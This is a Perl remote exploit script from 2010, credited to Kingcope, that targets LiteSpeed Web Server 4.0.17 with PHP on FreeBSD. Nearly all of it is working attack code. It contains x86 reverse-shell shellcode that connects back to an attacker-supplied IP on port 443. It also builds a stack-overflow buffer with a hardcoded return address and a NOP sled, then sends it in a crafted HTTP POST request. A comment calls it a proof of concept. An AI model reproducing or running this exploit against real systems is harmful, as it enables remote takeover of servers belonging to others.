# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD # bug discovered & exploited by Kingcope # # Dec 2010 # Lame Xploit Tested with success on # FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86 # FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86 # FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86 # can be used against the admin interface (port 7080), too # Xploit only works on default lsphp binary not the compiled version # # this should be exploitable on linux too (on the compiled SAPI version) # the shipped linux version of lsphp has stack cookies enabled, # which could be brute forced if there wasn't a null put at the end of # the exploit buffer. The compiled SAPI version is exploitable, but then # the offsets differ from box to box, so this time FreeBSD targets only. # thus on linux this is very tricky to exploit. # this is a proof of concept, don't try this on real boxes # see lsapilib.c line 1240 use IO::Socket; $|=1; #freebsd reverse shell port 443 #setup a netcat on this port ^^ $bsdcbsc = # setreuid, no root here "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80". # connect back :> "\x31\xc0\x31\xdb\x53\xb3\x06\x53". "\xb3\x01\x53\xb3\x02\x53\x54\xb0". "\x61\xcd\x80\x31\xd2\x52\x52\x68". "\x41\x41\x41\x41\x66\x68\x01\xbb". "\xb7\x02\x66\x53\x89\xe1\xb2\x10". "\x52\x51\x50\x52\x89\xc2\x31\xc0". "\xb0\x62\xcd\x80\x31\xdb\x39\xc3". "\x74\x06\x31\xc0\xb0\x01\xcd\x80". "\x31\xc0\x50\x52\x50\xb0\x5a\xcd". "\x80\x31\xc0\x31\xdb\x43\x53\x52". "\x50\xb0\x5a\xcd\x80\x31\xc0\x43". "\x53\x52\x50\xb0\x5a\xcd\x80\x31". "\xc0\x50\x68\x2f\x2f\x73\x68\x68". "\x2f\x62\x69\x6e\x89\xe3\x50\x54". "\x53\x50\xb0\x3b\xcd\x80\x31\xc0". "\xb0\x01\xcd\x80"; sub usage() { print "written by kingcope\n"; print "usage:\n". "litespeed-remote.pl \n\n". "example:\n". "perl litespeed-remote.pl 192.168.2.3 8088 192.168.2.2 phpinfo.php\n\n"; exit; } if ($#ARGV ne 3) { usage; } $target = $ARGV[0]; $port = $ARGV[1]; $cbip = $ARGV[2]; $file = $ARGV[3]; ($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip")); substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4); #my $sock = IO::Socket::INET->new(PeerAddr => $target, # PeerPort => 8088, # Proto => 'tcp'); #$a = "A" x 500; #print $sock "POST /phpinfo.php HTTP/1.1\r\nHost: 192.168.2.5\r\n\r\n"; #$x = ; #$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE #$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE $ret = pack("V", 0x080F40CD); # JMP EDX lsphp my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => $port, Proto => 'tcp'); $a = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500; $sc = "\x90" x 3000 . $bsdcbsc; print $sock "POST /\x90\x90\x90\x90\x90\x90\xeb\x50/../$file? HTTP/1.1\r\nHost: $target\r\nVVVV: $sc\r\n$a KINGCOPEH4XXU:\r\n\r\n"; while (<$sock>) { print; }